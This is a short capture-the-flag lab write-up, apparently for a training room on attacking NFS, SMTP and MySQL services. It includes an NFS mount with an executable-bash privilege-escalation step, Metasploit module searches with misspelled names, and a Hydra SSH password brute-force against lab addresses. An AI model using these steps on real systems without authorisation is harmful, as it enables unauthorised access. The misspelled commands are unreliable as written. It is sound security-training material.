Network Services 2

January 29, 2024

Task 2: Understanding NFS

Task 3: Enumerating NFS

Task 4: Exploiting NFS

sudo mount -t nfs 10.10.82.65:/home /tmp/attacker/
sudo chmod +x bash

Just use sudo for you to not get this error

Task 5: Understanding SMTP

Task 6: Enemurating SMTP

search stmp_version
use 0
search stmp_enum
use 0

Task 7: Exploiting SMTP

hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vv 10.10.162.209 ssh

Then just ssh to the machine that we discover

Task 8: Understanding MySQL

Task 9: Enumerating MySQL

First we are going to try out the credentials that was given to us

Then after that just exit in the MySQL to use the metasploit next

There's too many information for just one screenshot

Task 11: Further Learning

Last updated